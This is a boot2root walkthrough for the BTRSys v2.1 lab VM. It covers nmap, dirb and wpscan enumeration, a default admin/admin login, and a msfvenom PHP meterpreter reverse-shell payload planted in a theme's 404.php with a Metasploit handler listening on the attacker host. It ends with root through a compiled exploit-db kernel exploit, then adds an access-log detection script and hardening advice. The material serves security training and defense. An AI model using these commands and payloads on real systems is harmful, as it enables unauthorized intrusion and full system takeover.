Hack the BTRSys: v2.1 VM (Boot2Root Challenge)

BTRSys is a boot2root challenge developed by ‘ismailonderkaya’ in the BTRSys series. This is an amazing practice lab which covers every technique.

Difficulty level: Intermediate

Walkthrough

Let’s start by finding our target. For that, use the following command:

netdiscover

Our target is 192.168.0.106, so run nmap against it to find out which ports and services are open. Use the following command:

nmap -A 192.168.0.106

From the nmap output you can see that ports 21, 22 and 80 are open, with the services FTP, SSH and HTTP respectively. As we still have a lot to find out about the target, we decided to use DIRB. DIRB is a web scanner, i.e. it scans the whole web application for files and directories, including hidden ones. Use the following command:

dirb http://192.168.0.106

Using dirb we found various files and directories such as robots.txt, upload, etc. The target web application is also running WordPress, so we can run a WordPress scan with the following command, which enumerates themes, plugins and users:

./wpscan.rb -u http://192.168.0.106/wordpress/ --enumerate at --enumerate ap --enumerate u

As a result we have found two users – btrisk and admin.

Now if you log in as admin using the password admin, you get access to the dashboard. Once you have that access, you can execute malicious PHP code there to get a meterpreter session. Generate the code with the following command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f raw

The above command will give you PHP code which you have to execute. Copy the code from <?php to die(); and paste it into the theme template (404.php of the twentyfourteen theme, the file requested in the next step).

Once the code is uploaded, execute it by requesting the following URL:

192.168.0.106/wordpress/wp-content/themes/twentyfourteen/404.php

Before requesting the above URL, make sure that your meterpreter handler is active. To do so, go to Metasploit and type the following:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.0.107

set lport 4444

exploit

Once the handler is active and the URL is requested, you will have your session. Let’s check the information of the system we have entered; for this, type:

sysinfo

Now let’s get a shell by simply typing:

shell

Through the shell we learned that the Ubuntu version is 16.04.2, and fortunately there is an exploit on exploit-db for this version of Ubuntu. Download this exploit.

This exploit will help you achieve privilege escalation so that you can directly access root. Once the exploit is downloaded, we need to compile it; for that, type:

gcc 41458.c -o rootshell

Now that the exploit has been compiled, upload it to the /tmp directory. For that you will need to change to the /tmp directory first. Use the following commands:

cd /tmp

upload /root/Desktop/rootshell

Now go to the shell, change to /tmp, give permissions to the rootshell exploit and then execute it. Use the following commands:

shell

cd /tmp

chmod 777 rootshell

./rootshell

To confirm, use the following command:

whoami

HURRAY!!!! We are root. And so our Boot2Root challenge is complete.
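The web foothold in this walkthrough (dashboard login, a theme template changed through the editor, then 404.php requested directly) leaves a recognizable sequence in the web server access log. The following is an added detection example, not part of the original walkthrough; the log lines are constructed, and it assumes the access-log layout shown and that theme edits are saved with a POST to wp-admin/theme-editor.php.

```python
import re

# Start of an Apache/nginx access-log line: client, timestamp, request, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# Assumption: theme edits are saved by POSTing to the classic editor endpoint.
EDITOR_RE = re.compile(r'^/(?:[^/]+/)*wp-admin/theme-editor\.php(?:\?|$)')
# WordPress includes theme templates itself; direct requests for them are unusual.
THEME_PHP_RE = re.compile(
    r'^/(?:[^/]+/)*wp-content/themes/[^/]+/[^?]+\.php(?:\?|$)')

# Constructed sample log: timestamps and the .50 client are invented,
# the other host and the paths are the ones used in the walkthrough.
SAMPLE_LOG = [
    '192.168.0.107 - - [01/Jan/2024:10:01:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 0',
    '192.168.0.107 - - [01/Jan/2024:10:03:40 +0000] "POST /wordpress/wp-admin/theme-editor.php HTTP/1.1" 302 0',
    '192.168.0.50 - - [01/Jan/2024:10:04:00 +0000] "GET /wordpress/ HTTP/1.1" 200 5120',
    '192.168.0.107 - - [01/Jan/2024:10:05:11 +0000] "GET /wordpress/wp-content/themes/twentyfourteen/404.php HTTP/1.1" 200 0',
]

def find_theme_tampering(lines):
    """Alert when a client saves a theme file in the dashboard editor and
    later requests a theme .php file directly."""
    last_edit = {}  # client ip -> timestamp of latest successful editor POST
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        ip, path = m["ip"], m["path"]
        if (m["method"] == "POST" and EDITOR_RE.match(path)
                and m["status"][0] in "23"):
            last_edit[ip] = m["ts"]
        elif THEME_PHP_RE.match(path) and ip in last_edit:
            alerts.append({"ip": ip, "edited_at": last_edit[ip],
                           "requested_at": m["ts"],
                           "path": path.split("?")[0]})
    return alerts

if __name__ == "__main__":
    for alert in find_theme_tampering(SAMPLE_LOG):
        print(alert)
```

On the hardening side, setting define('DISALLOW_FILE_EDIT', true); in wp-config.php removes the dashboard theme editor, and changing the admin/admin login closes the way into the dashboard.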

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.

 
